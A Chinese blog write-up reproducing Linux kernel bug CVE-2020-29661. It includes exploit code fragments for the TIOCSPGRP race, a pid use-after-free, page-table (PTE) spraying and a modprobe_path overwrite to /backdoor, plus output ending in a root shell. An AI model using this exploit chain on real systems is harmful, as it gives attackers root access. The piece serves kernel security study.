CVE-2020-29661复现

T1d 2024-9-23 70 9/23

在阅读Dirty Pagetable: A Novel Exploitation Technique To Rule Linux Kernel这篇文章时发现并没有对CVE-2020-29661这个漏洞的利用手法做太详细的介绍,在网上也没找到详细的公开exp,唯一一篇首次提出该漏洞的作者的exp也由于一些原因无法正常利用成功,因此博主考虑自己结合相关资料对该漏洞通过Dirty Pagetable方法进行复现。

复现环境及源码仓库:https://github.com/TLD1027/CVE-2020-29661

patch

diff --git a/drivers/tty/tty_jobctrl.c b/drivers/tty/tty_jobctrl.c
index 28a23a0fef21c3..baadeea4a289bf 100644
--- a/drivers/tty/tty_jobctrl.c
+++ b/drivers/tty/tty_jobctrl.c
@@ -494,10 +494,10 @@ static int tiocspgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t
 	if (session_of_pgrp(pgrp) != task_session(current))
 		goto out_unlock;
 	retval = 0;
-	spin_lock_irq(&tty->ctrl_lock);
+	spin_lock_irq(&real_tty->ctrl_lock);
 	put_pid(real_tty->pgrp);
 	real_tty->pgrp = get_pid(pgrp);
-	spin_unlock_irq(&tty->ctrl_lock);
+	spin_unlock_irq(&real_tty->ctrl_lock);
 out_unlock:
 	rcu_read_unlock();
 	return retval;

漏洞分析

看似已经spin_lock_irq进行了加锁处理,但是put_pid的对象是real_tty,上锁的对象是tty,如果考虑在条件竞争的某一个时刻:

  ioctl(fd1, TIOCSPGRP, pid_A)        ioctl(fd2, TIOCSPGRP, pid_B)
    spin_lock_irq(...)                  spin_lock_irq(...)
    put_pid(old_pid)
                                        put_pid(old_pid)
    real_tty->pgrp = get_pid(A)
                                        real_tty->pgrp = get_pid(B)
    spin_unlock_irq(...)                spin_unlock_irq(...)
  ioctl(fd1, TIOCSPGRP, pid_A)        ioctl(fd2, TIOCSPGRP, pid_B)
    spin_lock_irq(...)                  spin_lock_irq(...)
    put_pid(old_pid)
                                        put_pid(old_pid)
    real_tty->pgrp = get_pid(A)
                                        real_tty->pgrp = get_pid(B)
    spin_unlock_irq(...)                spin_unlock_irq(...)

这两种情况都会导致old_pid的引用计数被额外减一,造成pid结构体被违规释放,构造pid结构体的uaf

漏洞利用

这里主要采用Dirty Pagetable的方法,首先我们需要先利用cross-cache将漏洞结构体所在的slab回收,因为pid结构体分配通过kmem_cache实现的,是专用缓存,一开始我尝试喷pid但是发现有两个问题,第一个是由于为了保证fork出来的进程可以在需要的时候被释放我采用了在共享内存中设置标志位,这也就意味着子进程需要执行死循环一直去检查标志位是否被标记,当fork大量的子进程后会导致资源占用过多,耗时过长,第二个问题是释放时使用wait处理时也可能出现一直等待的情况,很难判定是因为释放数量太多造成了释放缓慢还是进程被锁死,因此查看首次提出该漏洞的作者的文章:

https://googleprojectzero.blogspot.com/2021/10/how-simple-linux-kernel-memory.html

https://project-zero.issues.chromium.org/issues/42451236

阅读后我发现在作者的exp里面他采用了seq_file结构体:

/*
* The child pid should be in a page together with a bunch of seqfiles
* allocations and nothing else.
*/
int seqfiles[32*2];
for (int i=0; i<32; i++)
seqfiles[i] = SYSCHK(open("/proc/self/maps", O_RDONLY));

应该是受到slab alias机制的影响,导致他们从同一个slab中分配,因此只需要打开/proc/self/maps就能实现堆喷的目的,但是如果要cross cache我们需要先触发漏洞将pid释放掉,但是如何来判断条件竞争是否是成功了呢?

还是回来看原作者的文章,发现原作者提到,如果我们有一种方法,能够先将引用计数提高到一个较大的数值,然后进行条件竞争执行递减操作,在竞争结束之后,逐次减少原先的引用计数,当检测到某个信号时,就说明此时的结构体已经被释放了,幸运的是他们确实找到了这样的一种方法:

On typical desktop/server distributions, the following approach works (unreliably, depending on RAM size) for setting up a freed struct pid with multiple dangling references:

1.Allocate a new struct pid (by creating a new task).

2.Create a large number of references to it (by sending messages with SCM_CREDENTIALS to unix domain sockets, and leaving those messages queued up).

3.Repeatedly trigger the TIOCSPGRP race to skew the reference count downwards, with the number of attempts chosen such that we expect that the resulting refcount skew is bigger than the number of references we need for the rest of our attack, but smaller than the number of extra references we created.

4.Let the task owning the pid exit and die, and wait for RCU (read-copy-update, a mechanism that involves delaying the freeing of some objects) to settle such that the task's reference to the pid is gone. (Waiting for an RCU grace period from userspace is not a primitive that is intentionally exposed through the UAPI, but there are various ways userspace can do it - e.g. by testing when a released BPF program's memory is subtracted from memory accounting, or by abusing the membarrier(MEMBARRIER_CMD_GLOBAL, ...) syscall after the kernel version where RCU flavors were unified.)

5.Create a new thread, and let that thread attempt to drop all the references we created.

Because the refcount is smaller at the start of step 5 than the number of references we are about to drop, the pid will be freed at some point during step 5; the next attempt to drop a reference will cause a use-after-free:

struct upid {
        int nr;
        struct pid_namespace *ns;
};

struct pid
{
        atomic_t count;
        unsigned int level;
        /* lists of tasks that use this pid */
        struct hlist_head tasks[PIDTYPE_MAX];
        struct rcu_head rcu;
        struct upid numbers[1];
};
[...]
void put_pid(struct pid *pid)
{
        struct pid_namespace *ns;

        if (!pid)
                return;

        ns = pid->numbers[pid->level].ns;
        if ((atomic_read(&pid->count) == 1) ||
             atomic_dec_and_test(&pid->count)) {
                kmem_cache_free(ns->pid_cachep, pid);
                put_pid_ns(ns);
        }
}

When the object is freed, the SLUB allocator normally replaces the first 8 bytes (sidenote: a different position is chosen starting in 5.7, see Kees' blog) of the freed object with an XOR-obfuscated freelist pointer; therefore, the count and level fields are now effectively random garbage. This means that the load from pid->numbers[pid->level] will now be at some random offset from the pid, in the range from zero to 64 GiB. As long as the machine doesn't have tons of RAM, this will likely cause a kernel segmentation fault. (Yes, I know, that's an absolutely gross and unreliable way to exploit this. It mostly works though, and I only noticed this issue when I already had the whole thing written, so I didn't really want to go back and change it... plus, did I mention that it mostly works?)

Linux in its default configuration, and the configuration shipped by most general-purpose distributions, attempts to fix up unexpected kernel page faults and other types of "oopses" by killing only the crashing thread. Therefore, this kernel page fault is actually useful for us as a signal: Once the thread has died, we know that the object has been freed, and can continue with the rest of the exploit.

If this code looked a bit differently and we were actually reaching a double-free, the SLUB allocator would also detect that and trigger a kernel oops (see set_freepointer() for the CONFIG_SLAB_FREELIST_HARDENED case).

但是在我尝试之后发现每次都不能成功,我发现pid->numbers[pid->level]中的pid—>level会被修改成一个极大的随机值,第一个挑战就是这个寻址不会寻址到一个不可读的空间,也就是说空间要足够大,同时,通过这个方法获取到的值ns还要进行下一步处理:

kmem_cache_free(ns->pid_cachep, pid);
put_pid_ns(ns);

那么第二个挑战是,他指向的pid_cachep得是一个内核堆地址,这样才能成功通过kmem_cache_free

另外再看put_pid_ns函数:

void put_pid_ns(struct pid_namespace *ns)
{
	struct pid_namespace *parent;

	while (ns != &init_pid_ns) {
		parent = ns->parent;
		if (!kref_put(&ns->kref, free_pid_ns))
			break;
		ns = parent;
	}
}

根据原作者的exp来看他是检测到进程陷入停滞状态就判断uaf被触发的,那么根据这个函数大概就能猜到应该是while的结束条件没有被满足,那么第三个挑战就需要这个ns->parent刚刚好是一个循环链表并且整个链表的所有元素都不满足结束的条件,综合上面的分析,我姑且认为原作者的exp仅仅能在理论条件下实现或者实现的概率极低,那么我们需要找到新的方法来检查pid结构体是否触发uaf了。

在组长的启发下,确实找到了一个更简单更快捷的办法来判断结构体是否被释放了,那就是通过getpid去检查进程号。首先观察可以发现条件竞争时子进程的refcount初始值是2,那么如果竞争成功并且作用于子进程,就会导致子进程在一轮竞争后就已经被释放掉了,这时如果我们立刻fork一个新的进程,他就会占用原本子进程的pid并更新进程号,也就是说,我们只需要检查子进程的进程号是否发生改变就能判断这个pid是否被我们释放掉了,下面给出关键代码:

for(child_i = 0; child_i < MAX_FORK_NUM; child_i++)
    {
        pid_t child = SYSCHK(fork());
        if (child == 0)
        {
            SYSCHK(prctl(PR_SET_PDEATHSIG, SIGKILL));
            pin_cpu(1);
            SYSCHK(setpgid(0, 0));
            child = getpid();
            for (int attempts = 0; attempts < SKEW_ATTEMPTS; attempts++)
            {
                while (1)
                {
                    char syncval = *syncptr;
                    if ((syncval & 1) == 0)
                    {
                        if (syncval == 10)
                            break;
                        *syncptr = syncval + 1;
                    }
                }
                SYSCHK(ioctl(tty, TIOCSPGRP, &parent));
                *syncptr = 11;
            }
            while(1)
            {
                if(*(syncptr + child_i + 0x100) == 1)
                {
                    if(getpid() == child){
                        *(syncptr + child_i + 0x100) = 2;   // continue
                        while(1){
                            if(*(syncptr + child_i + 0x100) == 4)
                            {
                                *(syncptr + child_i + 0x200) = 1;   // exit the new fork;
                                exit(0);
                            }
                        }
                    }
                    else{
                        printf("[*] child : %d, new-child : %d\n", child, getpid());
                        *(syncptr + child_i + 0x100) = 3;   // find the uaf pid
                        while(1){
                            if(*(syncptr + child_i + 0x100) == 4) {
                                printf("[*] Free the uaf pid again\n");
                                *(syncptr + child_i + 0x200) = 1;   // exit the new fork;
                                while(1)
                                {
                                    if(*(syncptr + child_i + 0x100) == 10)
                                    {
                                        SYSCHK(listen(listensock, 128));
                                        *(syncptr + child_i + 0x100) = 9;
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }
        for (int attempts = 0; attempts < SKEW_ATTEMPTS; attempts++)
        {
            SYSCHK(ioctl(ptmx, TIOCSPGRP, &child));
            *syncptr = 0;
            while (1)
            {
                char syncval = *syncptr;
                if ((syncval & 1) == 1)
                {
                    *syncptr = syncval + 1;
                    if (syncval == 9)
                        break;
                }
            }
            SYSCHK(ioctl(ptmx, TIOCSPGRP, &parent));
            while (*syncptr != 11)
                ;
        }
        int fack = fork();
        if(fack == 0)
        {
            while(1){
                if(*(syncptr + child_i + 0x200) == 1) exit(0);
            }
        }
        *(syncptr + 0x100 + child_i) = 1;
        while(1)
        {
            if(*(syncptr + child_i + 0x100) == 2)
            {
                 break;
            }else if(*(syncptr + child_i + 0x100) == 3)
            {
                break;
            }
        }

        if(*(syncptr + child_i + 0x100) == 3)
        {
            printf("[*] Find the uaf pid in child : %d\n", child_i);
            break;
        }
    }

通过这个方法我们很快就找到了这个被释放掉的pid结构体,接下来就是常规的cross cache操作,然后喷大量的PTE页表去占用这个有pid结构体的slab

由于pid被释放了我们要想在不引起kernel panic的情况下对pid进行处理就只能通过递增refcount的方式,因此我们需要在PTE页表的每一个可能对应pidrefcount的位置都分配一个页表项:

struct pid {
	refcount_t                 count;                /*     0     4 */
	unsigned int               level;                /*     4     4 */
	spinlock_t                 lock;                 /*     8     4 */

	/* XXX 4 bytes hole, try to pack */

	struct hlist_head          tasks[4];             /*    16    32 */
	struct hlist_head          inodes;               /*    48     8 */
	wait_queue_head_t          wait_pidfd;           /*    56    24 */
	/* --- cacheline 1 boundary (64 bytes) was 16 bytes ago --- */
	struct callback_head       rcu;                  /*    80    16 */
	struct upid                numbers[];            /*    96     0 */

	/* size: 96, cachelines: 2, members: 8 */
	/* sum members: 92, holes: 1, sum holes: 4 */
	/* last cacheline: 32 bytes */
};

因此只要在每个结构体内的前8个字节喷上PTE项即可。

这样当我们递增refcount的时候就可以通过观察对应的虚拟地址的值是否改变来判断漏洞pid结构体对应的虚拟地址,这里我们采用了原作者提到的方法实现对refcount的递增:

void add_to_refcount(int count, int listensock)
{
    for (int i = 0; i < count; i++)
    {
        int refsock = SYSCHK(socket(AF_UNIX, SOCK_STREAM, 0));
        SYSCHK(connect(refsock, (struct sockaddr *)&unix_addr, sizeof(unix_addr)));
        SYSCHK(accept(listensock, NULL, NULL) == -1);
    }
}

但是这种方式会收到资源限制,即使我们将进程资源数改到最大值也才4096,但是我们一次就需要递增至少0x1000才能实现篡改PTE指向下一个物理地址,因此我们需要通过子进程来绕过这个限制。因为每个进程打开的文件描述符有限,但是如果我们可以创建很多子进程就能在子进程中继续增加引用计数来绕过限制。

我首先用最简单的方式,我fork了一个子进程去增加引用计数,但是很快就出现了报错,显示已经达到了限制,我怀疑是子进程的数量不够,因此我选择fork了更多的进程,还是提示达到限制,于是我直接调试发现,不管我开了多少进程,都会达到一个瓶颈值,我查询资料发现这是因为fork会继承父进程的文件描述符,这就导致这种方法行不通,但是我发现clone也能创建子进程并且还可以选择不继承文件描述符,于是尝试用clone的方式递增,果然成功实现了对PTE的递增操作:

int child_func(void *arg) {
    int num = *((int *)arg);
    add_to_refcount(num, listensock);
    sleep(1);
    while (1) {}
}

int main()
{
    ...
    char *stack;
    char *stack_top;
#define STACK_SIZE (1024 * 1024)
    // 为子进程分配栈空间
    stack = malloc(STACK_SIZE);
    if (stack == NULL) {
        perror("malloc");
        exit(EXIT_FAILURE);
    }
    stack_top = stack + STACK_SIZE;

    int flags = SIGCHLD;

    // 创建子进程
    int times = 0x400;
    clone(child_func, stack_top, flags | SIGCHLD, &times);
    ...
}

这样只要提前在每个虚拟地址空间内用当前虚拟地址做标记,在递增操作结束后逐页检查就能找到对应漏洞对象的虚拟空间地址。

定位到漏洞对象记录的PTE对应的用户地址后,我们可以利用累加操作将PTE指向其他物理地址,但是由于mmap分配的物理地址与内核代码的物理地址和页表页的物理地址不是连续的且我们只有递增原语没有递减原语,因此我们利用dma-buf分配的共享内存页和页表页是从同一片物理地址分配的,这样我们可以构造:

|-------|
|  ...  |
|-------|
|  PTE  |
|-------|
|  DMA  |
|-------|
|  PTE  |
|-------|
|  ...  |
|-------|

当递增DMA共享页的物理地址时就能实现将临近的PTE页表页映射到用户空间的目的,因此大致流程为:

1.分配10个用户页表

2.利用递增原语构造同一物理页映射到不同的虚拟页找到addr1

3.回收addr1对应的页面,在addr1处分配dma-buf共享页

4.分配10个用户页表

5.利用递增原语构造将dma-buf对应的物理地址修改为页表页地址并映射到虚拟地址addr1

6.读取addr1判断是否映射成功,成功后将addr1对应的值加0x1000使得原本的虚拟地址addr3对应的物理页映射到addr2中,并沿用前面的方式找到addr2

至此我们已经构造出了一个可控的页表页addr1和他对应映射的虚拟页addr2,此时我们可以从起始地址开始遍历物理空间,通过在读取addr2中的信息来判断是否找到了内核基址对应的物理基址,找到物理基址后继续遍历寻找modprobe_path的物理地址,直接修改其对应的程序为/backdoor程序,并执行/error触发执行/backdoor修改/etc/passwd,或者也可以通过直接patch内核代码段来实现逃逸。

实现效果

[+] Boot took 2.05
[*] starting up...
[*] Increased fd limit from 1024 to 4096
[*] prepare PTE memory...
[*] executing in first level child process, setting up session and PTY pair...
[*] Begin cc1
[*] Begin cc2
[*] Begin cc3
[*] Launching child process
[*] child : 149, new-child : 150
[*] Find the uaf pid in child : 2
[*] Begin cc4
[*] UAF pid id : 2
[*] Free the uaf pid
[*] Free the uaf pid again
[*] Free finish
[*] Free the struct around uaf pid
[*] Free the struct in first 30 page
[*] Finish cc !
[*] spraying 10 pte's...
[*] spraying finish
[*] Find the pte in 0x10000290000, value 0x100002a0000
[*] Start dma
[*] dma_buf_fd : 7
[*] Start to unmap
[*] spraying finish
[*] Find the dma in 0x10000290000, pte-value 0x800000013fe6a067
[*] Find the pte-1 in 0x10001400000, value 0x10001c00000
[+] pte: 0x8000000050c00067  NUMBER TAG: 0xe801403f51258d48
[*] modprobe path: /sbin/modprobe

[*] setting physical address range to 0x8000000050c00067 - 0x8000000050e00067
[*] setting physical address range to 0x8000000050e00067 - 0x8000000051000067
[*] setting physical address range to 0x8000000051000067 - 0x8000000051200067
[*] setting physical address range to 0x8000000051200067 - 0x8000000051400067
[*] setting physical address range to 0x8000000051400067 - 0x8000000051600067
[*] setting physical address range to 0x8000000051600067 - 0x8000000051800067
[*] setting physical address range to 0x8000000051800067 - 0x8000000051a00067
[*] setting physical address range to 0x8000000051a00067 - 0x8000000051c00067
[*] setting physical address range to 0x8000000051c00067 - 0x8000000051e00067
[*] setting physical address range to 0x8000000051e00067 - 0x8000000052000067
[*] setting physical address range to 0x8000000052000067 - 0x8000000052200067
[*] modprobe path : /sbin/modprobe

[-] false positive. skipping to next one
[*] setting physical address range to 0x8000000052200067 - 0x8000000052400067
[*] setting physical address range to 0x8000000052400067 - 0x8000000052600067
[*] setting physical address range to 0x8000000052600067 - 0x8000000052800067
[*] setting physical address range to 0x8000000052800067 - 0x8000000052a00067
[*] setting physical address range to 0x8000000052a00067 - 0x8000000052c00067
[*] setting physical address range to 0x8000000052c00067 - 0x8000000052e00067
[*] setting physical address range to 0x8000000052e00067 - 0x8000000053000067
[*] setting physical address range to 0x8000000053000067 - 0x8000000053200067
[*] setting physical address range to 0x8000000053200067 - 0x8000000053400067
[*] setting physical address range to 0x8000000053400067 - 0x8000000053600067
[*] setting physical address range to 0x8000000053600067 - 0x8000000053800067
[*] setting physical address range to 0x8000000053800067 - 0x8000000053a00067
[*] setting physical address range to 0x8000000053a00067 - 0x8000000053c00067
[*] setting physical address range to 0x8000000053c00067 - 0x8000000053e00067
[*] setting physical address range to 0x8000000053e00067 - 0x8000000054000067
[*] setting physical address range to 0x8000000054000067 - 0x8000000054200067
[*] setting physical address range to 0x8000000054200067 - 0x8000000054400067
[*] modprobe path : /backdoor

[*] Found modprobe path at physical address 0x0000010001446aa0
/error: line 1: ����: not found
[*] flag : flag{test_flag_ujdbqwdwklqdmwqkldj}

/ $ su root
/ # id
uid=0 gid=0(root) groups=0(root)
/ # cat /etc/passwd
root::0:0:root:/root:/bin/sh
ctf:x:1000:1000:chal:/home/ctf:/bin/sh
/ # 

 

- THE END -
Tag:

T1d

9月23日14:51

最后修改:2024年9月23日
0

非特殊说明,本博所有文章均为博主原创。

共有 0 条评论

您必须 后可评论